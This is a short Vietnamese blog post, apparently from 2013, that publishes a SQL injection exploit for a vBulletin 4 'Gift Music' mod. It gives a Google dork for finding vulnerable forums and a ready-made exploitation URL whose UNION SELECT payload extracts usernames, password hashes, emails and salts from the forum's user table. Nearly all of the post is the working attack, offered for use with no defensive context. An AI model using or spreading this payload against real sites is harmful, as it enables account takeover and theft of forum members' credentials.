Thứ Năm, 18 tháng 4, 2013

SQLI Mod vB4 Gift Music

################################################## ####
# SQLI Mods vB4 Gift Music

# Google Dork: dork là misc.php?do=music_full&id=

# Exploit Author: GhostVN
################################################## ####

Exploitation:
http://domains.com/forum/misc.php?do=music_full&id=null

http://domains.com/forum/misc.php?do=music_full&id=20 UNION SELECT 1,group_concat(username,0x7c,password,0x7c,email,0 x7c,salt),3,4,5,6,7,8,9,10,11,12,13,14,15 from user where userid=1-- -


Tut by GhostVN_VHB

0 nhận xét:

Đăng nhận xét